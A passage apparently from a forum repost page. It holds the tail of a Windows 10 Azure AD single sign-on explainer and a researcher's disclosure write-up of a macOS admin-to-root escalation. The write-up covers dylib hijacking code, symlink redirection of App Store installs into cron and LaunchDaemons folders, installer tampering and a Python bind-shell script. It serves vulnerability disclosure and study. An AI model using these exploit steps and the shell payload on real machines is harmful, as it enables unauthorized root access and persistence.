    The Credential Provider gets the credentials to WinLogon which will call LsaLogonUser() API with the user credentials (to learn about the authentication architecture in Windows see Credentials Processes in Windows Authentication). The credentials get to a new component in Windows 10 called the Cloud Authentication Provider (Cloud AP). This is a plug-in based component running inside the LSASS (Local Security Authority Subsystem) process with one plug-in being the Azure AD Cloud AP plug-in. For simplicity in the diagram these two are shown as one Cloud AP box.

    The plug-in will authenticate the user against Azure AD and AD FS (if Windows Server 2016) to obtain the PRT. The plug-in will know about the Azure AD tenant and the presence of the AD FS by the information cached during device registration time. I explain this at the end of step #2 in the post Azure AD Join: what happens behind the scenes?when the information from the ID Token is obtained and cached just before performing registration (the explanation applies to both to domain joined devices registered with Azure AD and Azure AD joined devices).

     

    (3) Authentication of user and device to get PRT from Azure AD (and AD FS if federated and version of Windows Server 2016)

    Depending on what credentials are used the plug-in will obtain the PRT via distinct calls to Azure AD and AD FS.

    PRT based in username and password

    To obtain the Azure AD PRT using username and password, the plug-in will send the credentials directly to Azure AD (in a non-federated configuration) or to AD FS (if federated). In the federated case, the plug-in will send the credentials to the following WS-trust end-point in AD FS to obtain a SAML token that is then sent to Azure AD.

    adfs/services/trust/13/usernamemixed

    Note: This post has been updated to reflect that the end-point used is the usernamemixed and not the windowstransport as it was previously stated.

    Azure AD will authenticate the user with the credentials obtained (non-federated) or with verifying the SAML token obtained from AD FS (federated). After authentication Azure AD will build a PRT with both user and device claims and will return it to Windows.

    PRT based in the Windows Hello for Business credential

    To obtain the Azure AD PRT using the Windows Hello for Business credential, the plug-in will send a message to Azure AD to which it will respond with a nonce. The plug-in will respond with the nonce signed with the Windows Hello for Business credential key.

    Azure AD will authenticate the user by checking the signature based on the public key that it registered at credential provisioning as explained in the post Azure AD and Microsoft Passport for Work in Windows 10 (please note that Windows Hello for Business is the new name for Microsoft Passport for Work). The PRT will contain information about the user and the device as well, however a difference with the PRT obtained using username and password is that this one will contain a “strong authentication” claim.

    "acr":"2"

     

    Regardless of how the PRT was obtained, a session key is included in the response which is encrypted to the Kstk (one of the keys provisioned during device registration as explained in step #4 in the post Azure AD Join: what happens behind the scenes?).

    The session key is decrypted by the plug-in and imported to the TPM using the Kstk. Upon re-authentication the PRT is sent over to Azure AD signed using a derived version of the previously imported session key stored in the TPM which Azure AD can verify. This way we are bounding the PRT to the physical device reducing the risk of PRT theft.

     

    (4) Cache of the PRT for the Web Account Manager to access it during app authentication

    Once the PRT is obtained it is cached in the Local Security Authority (LSA). It is accessible by the Web Account Manager which is also a plug-in based component that provides an API for applications to get tokens from a given Identity Provider (IdP). It can access the PRT through the Cloud AP (who has access to the PRT) which checks for a particular application identifier for the Web Account Manager. There is a plug-in for the Web Account Manager that implements the logic to obtain tokens from Azure AD and AD FS (if AD FS in Windows Server 2016).

    You can see whether a PRT was obtained after sign-in/unlock by checking the output of the following command.

    dsregcmd.exe /status

    Under the ‘User State’ section check the value for AzureAdPrt which must be YES.

    prtindsregcmd

    A value of NO will indicate that no PRT was obtained. The user won’t have SSO and will be blocked from accessing service applications that are protected using device-based conditional access policy.

     

    A note on troubleshooting

    To troubleshoot why the PRT is not obtained can be a topic for a full post, however one test you can do is to check whether that same user can authenticate to Office 365, say via browser to SharePoint Online, from a domain joined computer without being prompted for credentials. If the UPN suffix of users in Active Directory on-premises don’t route to the verified domain (alternate login ID) please make sure you have the appropriate issuance transform rule(s) in AD FS for the ImmutableID claim.

    One other reason that I have seen PRT not being obtained, is when the device has a bad transport key (Kstk). I have seen this in devices that have been registered in a very early version of Windows (which upgraded to 1607 eventually). As the PRT is protected using a key in the TPM this could be a reason why the PRT is not obtained at all. One remediation for this case is to reset the TPM and let the device register again.

     

    (5, 6 and 7) Application requests access token to Web Account Manager for a given application service

    When a client application connects to a service application that relies in Azure AD for authentication (for example the Outlook app connecting to Office 365 Exchange Online) the application will request a token to the Web Account Manager using its API.

    The Web Account Manager calls the Azure AD plug-in which in turn uses the PRT to obtain an access token for the service application in question (5).

    There are two interfaces in particular that are important to note. One that permits an application get a token silently, which will use the PRT to obtain an access token silently if it can. If it can’t, it will return a code to the caller application telling it that UI interaction is required. This could happen for multiple reasons including the PRT has expired or when MFA authentication for the user is required, etc. Once the caller application receives this code, it will be able to call a separate API that will display a web control for the user to interact.

    WinRT API

    WebAuthenticationCoreManager.GetTokenSilentlyAsync(...) // Silent API
    WebAuthenticationCoreManager.RequestTokenAsync(...) // User interaction API

    Win32 API

    IWebAuthenticationCoreManagerStatics::GetTokenSilentlyAsync(...) // Silent API
    IWebAuthenticationCoreManagerInterop::RequestTokenForWindowAsync(...) // UI API

     

    After returning the access token to the application (6), the client application will use the access token to get access to the service application (7).

     

    Browser SSO

    When the user accesses a service application via Microsoft Edge or Internet Explorer the application will redirect the browser to the Azure AD authentication URL. At this point, the request is intercepted via URLMON and the PRT gets included in the request. After authentications succeeds, Azure AD sends back a cookie that will contain SSO information for future requests. Please note that support for Google Chrome is available since the Creators update of Windows 10 (version 1703) via the Windows 10 Accounts Google Chrome extension.

    Note: This post has been updated to state the support for Google Chrome in Windows 10.

     

    Final thoughts

    Remember that registering your domain joined computers with Azure AD (i.e. becoming Hybrid Azure AD joined) will give you instant benefits and it is likely you have everything you need to do it. Also, if you are thinking in deploying Azure AD joined devices you will start enjoying some additional benefits that come with it.

    Please let me know you thoughts and stay tuned for other posts related to device-based conditional access and other related topics.

    See you soon,

    Jairo Cadena (Twitter: @JairoC_AzureAD)

     

    Sursa: https://jairocadena.com/2016/11/08/how-sso-works-in-windows-10-devices/

  12. macOS - Getting root with benign AppStore apps

     June 1, 2019  24 minutes read
     BLOG
     macos • vulnerability • lpe

    This writeup is intended to be a bit of storytelling. I would like to show how I went down the rabbit hole in a quick ’research’ I wanted to do, and eventually found a local privilege escalation vulnerability in macOS. I also want to show, tell about all the obstacles and failures I run into, stuff that people don’t talk about usually, but I feel it’s part of the process all of us go through, when we try to create something.

    If you prefer to watch this as a talk, you can se it here: Csaba Fitzl - macOS: Gaining root with Harmless AppStore Apps - SecurityFest 2019 - YouTube

    Slides are here: Getting root with benign app store apps

    DYLIB Hijacking on macOS

    This entire story started with me trying to find dylib hijacking vulnerability in a specific application, which I can’t name here. Well, I didn’t find any in that app, but found plenty in many others.

    If you are not familiar with dylib hijacking on macOS, read Patrick Wardle’s great writeup: Virus Bulletin :: Dylib hijacking on OS X or watch his talk on the subject: DEF CON 23 - Patrick Wardle - DLL Hijacking on OS X - YouTube

    I would go for the talk, as he is a great presenter, and will explain the subject in a very user friendly way, so you will understand all the details.

    But just to sum it up here, in very short, there are 2 type of dylib hijackings possible: 1. weak loading of dylibs - in this case the OS will use the LC_LOAD_WEAK_DYLIB function, and if the dylib is not found the application will still run and won’t error out. So if there is an app that refers to a dylib with this method and that is not present, you can go ahead place yours there and profit. 2. rpath (run-path dependent) dylibs - in this case the dylibs are referenced with the @rpath prefix, which will point to the current running location of the mach-o file, and will try to find the dylibs based on this search path. It’s useful if you don’t know where your app will end up after installation. Developers can specify multiple search paths, and in case the first or first couple doesn’t exists, you can place your malicious dylib there, as the loader will search through these paths in sequential order. In its logic this is similar to classic DLL hijacking on Windows.

    Finding vulnerable apps

    It couldn’t be easier, you go download Patrick’s DHS tool, run the scan and wait. Link: Objective-See There is also a command line version: GitHub - synack/DylibHijack: python utilities related to dylib hijacking on OS X

    1. For the walkthrough I will use the Tresorit app as an example as they already fixed the problem, and big kudos for them, as they not only responded but also fixed this in a couple of days after reporting. I will not mention all of the apps here, but you will be amazed how many are out there.

    image1

    The vulnerability is with Tresorit’s FinderExtension:

    /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension

    And you can place your dylib here:

    rpath vulnerability: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/Frameworks/UtilsMac.framework/Versions/A/UtilsMac

    DHS will only show you the first hijackable dylib, but there can be more. Set the DYLD_PRINT_RPATHS variable to 1 in Terminal, and you will see which dylibs the loader tries to load. You can see below that we can hijack two dylibs.

    $ export DYLD_PRINT_RPATHS="1"
    $ 
    $ /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    RPATH failed to expanding     @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
    RPATH successful expansion of @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
    RPATH failed to expanding     @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
    RPATH successful expansion of @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
    Illegal instruction: 4
    $ 

    Additionally it’s a good idea to double check if the App is compiled with the library-validation option (flag=0x200). That would mean that the OS will verify if all dylibs are signed or not, so you can’t just create anything and use that. Most of the apps are not compiled this way, including Tresorit (but they promised to fix it):

    $ codesign -dvvv /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    Executable=/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    Identifier=com.tresorit.mac.TresoritExtension.FinderExtension
    Format=bundle with Mach-O thin (x86_64)
    CodeDirectory v=20200 size=754 flags=0x0(none) hashes=15+5 location=embedded
    (...)

    Utilizing the vulnerability

    It’s also something that is super easy based on the talk above, but here it is in short. I made the following POC:

    #include <stdio.h>
    #include <stdlib.h>
    #include <syslog.h>
    
    __attribute__((constructor))
    void customConstructor(int argc, const char **argv)
     {
         printf("Hello World!\n");
         system("/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal");
         syslog(LOG_ERR, "Dylib hijack successful in %s\n", argv[0]);
    }

    The constructor will be called upon loading the dylib. It will print you a line, create a syslog entry, and also start Terminal for you. If the app doesn’t run in sandbox you get a full featured Terminal. Compile it:

    gcc -dynamiclib hello.c -o hello-tresorit.dylib -Wl,-reexport_library,"/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"

    Then run Patrick’s fixer script. It will fix the dylib version for you (the dylib loader will verify that when loading) and also will add all the exports that are exported by the original dylib. Those exports will actually point to the valid dylib, so when the application loads our crafted version, it can still use all the functions and won’t crash.

    python2 createHijacker.py hello-tresorit.dylib "/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"
    CREATE A HIJACKER (p. wardle)
    configures an attacker supplied .dylib to be compatible with a target hijackable .dylib
    
     [+] configuring hello-tresorit.dylib to hijack UtilsMac
     [+] parsing 'UtilsMac' to extract version info
         found 'LC_ID_DYLIB' load command at offset(s): [2568]
         extracted current version: 0x10000
         extracted compatibility version: 0x10000
     [+] parsing 'hello-tresorit.dylib' to find version info
         found 'LC_ID_DYLIB' load command at offset(s): [888]
     [+] updating version info in hello-tresorit.dylib to match UtilsMac
         setting version info at offset 888
     [+] parsing 'hello-tresorit.dylib' to extract faux re-export info
         found 'LC_REEXPORT_DYLIB' load command at offset(s): [1144]
         extracted LC command size: 0x48
         extracted path offset: 0x18
         computed path size: 0x30
         extracted faux path: @rpath/UtilsMac.framework/Versions/A/UtilsMac
     [+] updating embedded re-export via exec'ing: /usr/bin/install_name_tool -change
     [+] copying configured .dylib to /Users/csaby/Downloads/DylibHijack/UtilsMac

    Once that is done, you can just copy the file over and start the app.

    Other apps

    Considering the amount of vulnerable apps, I didn’t even take the time to report all these issues, only a few. Beside Tresorit I reported one to Avira, and they promised a fix but with low priority as you had to get root for utilising this, and the others were in MS Office 2016, where MS said they don’t consider this as a security bug as you need root privileges to exploit it, they said I can submit as a product bug. I don’t agree, cause this is a way for persistence, but I suppose I have to live with it.

    The privilege problem

    My original ‘research’ was done, but this is the point where I went beyond what I expected in the beginning.

    There is a problem in case of many apps, in theory you just need to drop your dylib into the right place, but there can be a two main scenarios in terms of privileges required for utilising the vulnerability.

    1. The application folder is owned by your account (in reality everyone is admin on his Mac so I won’t deal with standard users here) - in that case you can go and drop your files easily
    2. The application folder is owned by root, so you need root privileges in order to perform the attack. Honestly this kinda makes it less interesting, cause if you can get root, you can do much better persistence elsewhere and the app will typically run in sandbox and under the user’s privileges, so you won’t get too much out of it. It’s still a problem but makes it less interesting.

    Typically applications you drag and drop to the /Application directory will fall into the first category. All applications from the App Store will fall into the 2nd category, it’s because they will be installed by the installd daemon which is running as root . Apps that you install from a package will typically also fall into the 2nd category, as typically those require elevation of privilege.

    I wasn’t quite happy with all vendor responses, and also didn’t like that exploitation is limited to root most of the times, so I started to think: Can we bypass root folder permissions? Spoiler: YES, otherwise this would be a very short post. :)

    Tools for monitoring

    Before moving on, I want to mention a couple of tools, that I found useful for event monitoring.

    FireEye - Monitor.app

    This is a procmon like app created by FireEye, it can be downloaded from here: Monitor.app | Free Security Software | FireEye It’s quite good!

    image2

    Objective-See’s ProcInfo library & ProcInfoExample

    This is an open source library for monitoring process creation and termination on macOS. I used the demo project of this library, called ProcInfoExample. It’s a command line utility and will log every process creation, with all the related details, like arguments, signature info, etc… It will give you more information than FE’s Monitor app. It’s output is like:

    2019-03-11 21:18:05.770 procInfoExample[32903:4117446] process start:
    pid: 32906
    path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
    user: 0
    args: (
        "/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update",
        "/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/BC005493-3176-43E4-A1F0-82D38C6431A3.activeSandbox/Root/Applications/Parcel.app"
    )
    ancestors: (
        9103,
        1
    )
     signing info: {
        signatureAuthorities =     (
            "Software Signing",
            "Apple Code Signing Certification Authority",
            "Apple Root CA"
        );
        signatureIdentifier = "com.apple.efw_cache_update";
        signatureSigner = 1;
        signatureStatus = 0;
    }
     binary:
    name: efw_cache_update
    path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
    attributes: {
        NSFileCreationDate = "2018-11-30 07:31:32 +0000";
        NSFileExtensionHidden = 0;
        NSFileGroupOwnerAccountID = 0;
        NSFileGroupOwnerAccountName = wheel;
        NSFileHFSCreatorCode = 0;
        NSFileHFSTypeCode = 0;
        NSFileModificationDate = "2018-11-30 07:31:32 +0000";
        NSFileOwnerAccountID = 0;
        NSFileOwnerAccountName = root;
        NSFilePosixPermissions = 493;
        NSFileReferenceCount = 1;
        NSFileSize = 43040;
        NSFileSystemFileNumber = 4214431;
        NSFileSystemNumber = 16777220;
        NSFileType = NSFileTypeRegular;
    }
    signing info: (null) 

    Built-in fs_usage utility

    The fs_usage utility can monitor file system event very detailed, I would say even too detailed, you need to do some good filtering if you want to get useful data out of it. You get something like this:

    (standard input):21:27:01.229709  getxattr               [ 93]           /Applications/Parcel.app                                                                                                                                              0.000017   lsd.4123091
    (standard input):21:27:01.229719  access                       (___F)    /Applications/Parcel.app/Contents                                                                                                                                     0.000005   lsd.4123091
    (standard input):21:27:01.229819  fstatat64                              [-2]//Applications/Parcel.app                                                                                                                                         0.000013   lsd.4123091
    (standard input):21:27:01.229927  getattrlist                            /Applications/Parcel.app                                                                                                                                              0.000006   lsd.4123091
    (standard input):21:27:01.229933  getattrlist                            /Applications/Parcel.app/Contents                                                                                                                                     0.000006   lsd.4123091
    (standard input):21:27:01.229939  getattrlist                            /Applications/Parcel.app/Contents/MacOS                                                                                                                               0.000005   lsd.4123091
    (standard input):21:27:01.229945  getattrlist                            /Applications/Parcel.app/Contents/MacOS/Parcel                                                                                                                        0.000005   lsd.4123091
    (standard input):21:27:01.229957  getattrlist                            /Applications/Parcel.app                                                                                                                                              0.000005   lsd.4123091

    Bypassing root folder permissions in App Store installed apps

    The goal here is to write any file inside an AppStore installed application, which is by default only accessible for root. The bypass will only work if the application was installed already at least once (since when you buy it, you need to authenticate to the AppStore even if it’s free or if the user checked in ‘Save Password’ for free apps, you can get those as well. What I ‘noticed’ first is that you can create folders in the “/Applications” folder - obviously as you can also drag and drop apps there. But what happens if I create folders for the to-be-installed app? Here is what happens and the steps to bypass the root folder permissions:

    1. Before you delete the app take a note of the folder structure - you have read access to that. This is just for knowing what to recreate later.
    2. Start Launchpad locate the app, and delete it if installed currently. Interestingly it will remove the application, although you interact with Launchpad as normal user. Note that it can only do that for apps installed from the App Store.
    3. Create the folder structure with your regular ID in the /Applications folder, you can do that without root access. It’s enough to create the folders you need, no need for all, and place your dylib (or whatever you want) there
    4. Go back to the AppStore and on the Purchased tab, locate the app, and install it. You don’t need to authenticate in this case. You can also use the command line utility available from Github: GitHub - mas-cli/mas: Mac App Store command line interface

    At this point the app will be installed and you can use it, and you have your files there, which you couldn’t place there originally without root permissions.

    This was fixed in Mojave 10.14.5, I will talk about that later.

    To compare, it’s like having write access to the “Program Files” folder on Windows. Admin users do have it, but only if they run as HIGH integrity, so that means you need to bypass UAC from the default MEDIUM integrity mode. But in Windows, MEDIUM integrity Admin to HIGH integrity Admin elevation is not a security boundary, but in macOS admin to root is a boundary.

    Taking it further - Dropping AppStore files anywhere

    At this point I had another idea. Since installd runs as root, can we use it to place the app somewhere else or certain parts of it? The answer is YES. Let’s say I want to drop the App’s main mach-o file in a folder where only root has access, e.g.: /opt (folders protected by SIP, like /System won’t work, as even root doesn’t have access there). Here are the steps to reproduce it: Step 1-2 is the same as in the previous case. 3. Create the following folder structure: /Applications/Example.app/Contents 4. Create a symlink ‘MacOS’ pointing to /opt: ln -s /opt /Applications/Example.app/Contents/MacOS The main mach-o file is typically in the following folder: /Applications/Example.app/Contents/MacOS and now in our case we point this to /opt 5. Install the App

    What happens at this point, is that the App will install normally, except that any files under /Applications/Example.app/Contents/MacOS will go to /opt. If there was a file with the name of the mach-o file, that will be overwritten. Essentially what we can achieve with this is to drop any files that can be found in an AppStore app to a location we control.

    What can’t we do? (Or at least I didn’t find a way)

    1. Change the name of the file being dropped, or with other words, put the contents of one file into another one with different name. If we create a symlink for the actual mach-o file, like: ln -s /opt/myname /Applications/Example.app/Contents/MacOS/Example What will happen is that the symlink will be overwritten, when the installd daemon moves the file from the temporary location to the final. You can find the same behaviour if you experiment with the mv command:

      $ echo aaa > a
      $ ln -s a b
      $ ls -la
      total 8
      drwxr-xr-x   4 csaby  staff   128 Sep 11 16:16 .
      drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..
      -rw-r--r--   1 csaby  staff     4 Sep 11 16:16 a
      lrwxr-xr-x   1 csaby  staff     1 Sep 11 16:16 b -> a
      $ cat b
      aaa
      $ echo bbb >> b
      $ cat b
      aaa
      bbb
      $ touch c
      $ ls -l
      total 8
      -rw-r--r--  1 csaby  staff  8 Sep 11 16:16 a
      lrwxr-xr-x  1 csaby  staff  1 Sep 11 16:16 b -> a
      -rw-r--r--  1 csaby  staff  0 Sep 11 16:25 c
      $ mv c b
      $ ls -la
      total 8
      drwxr-xr-x   4 csaby  staff   128 Sep 11 16:25 .
      drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..
      -rw-r--r--   1 csaby  staff     8 Sep 11 16:16 a
      -rw-r--r--   1 csaby  staff     0 Sep 11 16:25 b
      1. Even if we create a hardlink instead of symlink, that will be overwritten like in the 1st case.
      2. As noted earlier we can’t write to folder protected by SIP.

      Ideas for using this for privilege escalation

      Based on the above I had the following ideas for privilege escalation from admin to root: 1. Find a file in the AppStore that has the same name as a process that runs as root, and replace that file. 2. Find a file in the AppStore that has a cron job line inside and called “root”, you could drop that into /usr/lib/cron/tabs 3. If you don’t find one, you can potentially create a totally harmless App, that will give you an interactive prompt, or something similar, upload it to the AppStore (it should bypass Apple’s vetting process as it will nothing do any harm). For example your file could contain an example root crontab file, which start Terminal every hour. You could place that in the crontab folder. 4. Make a malicious dylib, upload it as part of an app to the Appstore and drop that, so an app running as root will load it

      Reporting to Apple

      I will admit that at this point I took the lazy approach and reported the above to Apple, mainly because: * I found it very unlikely that I will find a suitable file that satisfies either #1 or #2 * Xcode almost satisfied #2 as it has some cron examples, but not named as root * I had 0 experience in developing AppStore apps, and I couldn’t code neither in Objective-C or Swift * I had better things to do at work and after work :)

      So I reported and then Apple came back at one point for my privilege escalation ideas: “The App Review process helps prevent malicious applications from becoming available on the Mac and iOS App Stores.“

      Obviously Apple didn’t understood the problem for first, it was either my fault not explaining it properly or they didn’t understood it, but it was clear that there was a misunderstanding between us, so I felt that I have to prove my point if I want this fixed. So I took a deep breath and gone the “Try Harder” approach and decided to develop an App and submit it to the AppStore.

      Creating an App

      After some thinking I decided that I will create an application that will have a crontab file for root, and I will drop it to the /usr/lib/cron/tabs folder. The app had to do something meaningful in order to submit it, and to be accepted, so I came up with the idea of creating a cronjob editor app. It’s also useful, and would also explain why I have a crontab files embedded. Here is my journey:

      Apple developer ID

      In order to submit any App to the store you have to sign up for the developer program. I signed up with a new Apple ID for the Apple developer program just because I had the fear that they will ban me, once I introduce an app that can be used for private escalation. In fact they didn’t. It’s 99$/ annum.

      Choosing a language

      I had no prior knowledge of either Objective C or Swift, but looking on the following syntax for Obj-C, freaked me out:

      myFraction = [[Fraction alloc] init];

    This is how you call methods of objects and pass parameters. It’s against every syntax I ever knew and I just didn’t want to consume this. So I looked at Swift which looked much nicer in this space and decided to go with that. :)

    Learning Swift

    My company has a subscription to one of the big online training portals, where I found a short, few hour long course about introduction to Cocoa app development with Swift. It was an interesting course, and it turned out to be sufficient, basically it covered how to put together a simple window based GUI. It also turned out that there is Swift 1 and 2 and 3 and 4, as the language evolved, and the syntax is also changed over time a bit, so you need to pick up the right training.

    Publishing to the store - The Process

    1. Become an Apple Developer, costs 99$/year
    2. Login to App Store Connect and create a Bundle ID: https://developer.apple.com/account/mac/identifier/bundle/create image3

    3. Go back and create a new App referring the Bundle ID you created: https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/ng/app image4

    4. Populate the details (license page, description, etc…)

    5. Upload your app from Xcode

    6. Populate more details if needed

    7. Submit for review

    Publishing to the store - The error problem

    Developing the App was pretty quick, but publishing it was really annoying, because I really wanted to see that my idea is indeed works. So once I pushed it, I had to wait ~24 hours for it being reviewed. I was really impatient and nervous about if I can truly make it to the store :) The clock ticked, and it was rejected! :( The reason was that when I clicked the close button, the app didn’t exit and the user had now way to bring back the window. I fixed it, resubmit, wait again ~24 hours. Approved! I quickly went to the store, prepared the exploit, and clicked install. Meanwhile during the development I upgraded myself to Mojave, and never really did any other tests with other apps. So it was really embarrassing to notice, that in Mojave this exploit path doesn’t work :( No problem, I have a High Sierra VM, let’s install it there! There I got a popup, that the minimum version required for the App is 10.14 (Mojave), and I can’t put it on HS… :( damn, it’s an easy fix, but that means resubmit again, wait ~24 hours. Finally it got approved again, and the exploit worked on High Sierra! :) It was a really annoying process, as every time I made a small mistake, fixing it meant 24 hours, even if the actual fix in the code, took 1 minute.

    The App

    The application I developed, is called “Crontab Creator”, which is actually very useful for creating crontab files. It’s still there and available, and as it turns out, there are a few people using it. ‎Crontab Creator on the Mac App Store

    image5

    The application is absolutely benign! However it contains different examples for crontab files, which are all stored as separate files within the application. The only reason I didn’t store the strings embedded in the source code is to be able to use it for exploitation :) Among these there is one called ‘root’, which will try to execute a script from the _Applications_Scripts folder.

    Privilege Escalation on High Sierra

    The Crontab Creator app contains a file named ‘root’ as an example for crontab file, along with 9 others. The content is the following:

    * * * * * /Applications/Scripts/backup-apps.sh

    Obviously this script doesn’t exists by default, but you can easily create it in the /Application folder, as you have write access, and at that point you can put anything you want into it.

    The steps for the privilege escalation are as follows. First we need to create the app folder structure, and place a symlink there.

    cd /Applications/
    mkdir "Crontab Creator.app"
    cd Crontab\ Creator.app/
    mkdir Contents
    cd Contents/
    ln -s /usr/lib/cron/tabs/ Resources

    Then we need to create the script file, which will be run every minute, I choose to run Terminal.

    cd /Applications/
    mkdir Scripts
    cd Scripts/
    echo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal > backup-apps.sh
    chmod +x backup-apps.sh

    Then we need to install the application from the store. We can do this either via the GUI, or we can do it via the CLI if we install brew, and then mas.

    Commands:

    /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
    brew install mas
    mas install 1438725196

    In summary utilizing the previous vulnerabilities we can drop the file into the crontab folder, create the script with starting Terminal inside it, and in a minute we got a popup and root access.

    The fix

    As noted before, Apple fixed this exploit path in Mojave. This was in 2018 October, my POC didn’t work anymore, and without further testing I honestly thought that the privilege escalation issue is fixed - yes you could still drop files inside the app, but I thought that the symlink issue is solved. I couldn’t have been more wrong! But this turned out only later.

    Infecting installers without breaking the Application’s signature

    The next part is where we want to bypass root folder permission for manually installed apps. We can’t do a true bypass / privilege escalation here, as during the installation the user have to enter his/her password, but we can still apply the previous idea. However here I want to show another method, and that’s how to embed our custom file into an installer package. If we can MITM a pkg download, we could replace it with our own one, or we can simply deliver it to the user via email or something.

    As a side note, interestingly AppStore apps are downloaded through HTTP, you can’t really alter it, as the hash is downloaded via HTTPS and the signature will also verified.

    Here are the steps, how to include your custom file in a valid package:

    1. Grab an installer pkg, for example from the AppStore (Downloading installer packages from the Mac App Store with AppStoreExtract | Der Flounder)
    2. Unpack the pkg: pkgutil --expand example.pkg myfolder
    3. Enter the folder, and decompress the embedded Payload (inside the embedded pkg folder): tar xvf embedded.pkg/Payload
    4. Embedded your file (it can be anywhere and anything):

      $ mkdir Example.app/Contents/test
      $ echo aaaa > Example.app/Contents/test/a
      1. Recompress the app: find ./Example.app | cpio -o --format odc | gzip -c > Payload
      2. Delete unnecessary files, and move the Payload to the embedded pkg folder.
      3. Repack the pkg pkgutil --flatten myfolder/ mypackage.pkg

      The package’s digital signature will be lost, so you will need a method to bypass Gatekeeper. The embedded App’s signature will be also broken, as these days every single file inside an .app bundle must be digitally signed. Typically the main mach-o file is signed, and it has the hash of the _CodeSignatures plist file. The file will contain all the hashes for the other files. If you place a new file inside the .app bundle that will invalidate the signature. However this is not a problem here, as if you can bypass Gatekeeper for the .pkg file, the installed Application will not be subject to Gatekeeper’s verification.

      Redistributing paid apps

      Using the same tool as in the previous example we can grab the installer for a given application. If you keep a paid app this way, it will still work somewhere else even if that person didn’t pay for the app. There is no default verification in an application if it was purchased or not, it also doesn’t contain anything that tracks this. With that, if you buy an application, you can easily distribute it somewhere else. In-App purchases probably won’t work as those are tied to the Apple ID, and if there is another activation needed, that could be also a good countermeasure. But apps that doesn’t have these can be easily stolen. Developers should build-in some verification of Apple IDs. I’m not sure that it’s possible but would be useful for them.

      Privilege escalation returns on Mojave

      The fix

      This year (2019) I’ve been talking to a few people about this, and it hit me, that I didn’t do any further checks if symlinks are completely broken (during the installation) or not. It turned out that they are still a thing.

      The way the fix is working is that installd has no longer access to the crontab folder (/usr/lib/cron/tabs) even running as root, so it won’t be able to create files there. I’m not even sure that this is a direct fix for my POC or some other coincidence. We can find the related error message in /var/log/install.log (you can use the Console app for viewing logs):

      2019-01-31 20:44:49+01 csabymac shove[1057]: [source=file] failed _RelinkFile(/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/401FEDFC-1D7B-4E47-A6E9-E26B83F8988F.activeSandbox/Root/Applications/Crontab Creator.app/Contents/Resources/peter, /private/var/at/tabs/peter): Operation not permitted

    The problem

    The installd process had still access to other folders, and can drop files there during the redirection, and those could be abused as well. I tested and you could redirect file writes to the following potentially dangerous folders:

    /var/root/Library/Preferences/

    Someone could drop a file called com.apple.loginwindow.plist, which can contain a LoginHook, which will run as root.

    /Library/LaunchDaemons/

    Dropping a plist file here will execute as root

    /Library/StartupItems/

    Dropping a file here will also execute as root.

    You can also write to /etc.

    Dropping files into these locations are essentially the same idea as dropping a file to the crontab folder. Potentially many other folders are also affected, so you can craft malicious dylib files, etc… but I didn’t explore other options.

    The 2nd POC

    With that, and now being an ‘experienced’ :D macOS developer, I made a new POC, called StartUp. It’s this:‎StartUp on the Mac App Store

    image6

    It is really built along the same line as the previous one, but in this case for LaunchDaemons.

    The way to utilize it is:

    cd /Applications/
    mkdir “StartUp.app”
    cd StartUp.app/
    mkdir Contents
    cd Contents/
    ln -s /Library/LaunchDaemons/ Resources
    cd /Applications/
    mkdir Scripts
    cd Scripts/

    Here you can create a sample.sh script that will run as root after booting up. For myself I put a bind shell into that script, and after login, connecting to it I got a root shell, but it’s up to you what you put there.

    #sample.sh
    python /Applications/Scripts/bind.py
    #bind.py
    #!/usr/bin/python2
    """
    Python Bind TCP PTY Shell - testing version
    infodox - insecurety.net (2013)
    Binds a PTY to a TCP port on the host it is ran on.
    """
    import os
    import pty
    import socket
    
    lport = 31337 # XXX: CHANGEME
    
    def main():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('', lport))
        s.listen(1)
        (rem, addr) = s.accept()
        os.dup2(rem.fileno(),0)
        os.dup2(rem.fileno(),1)
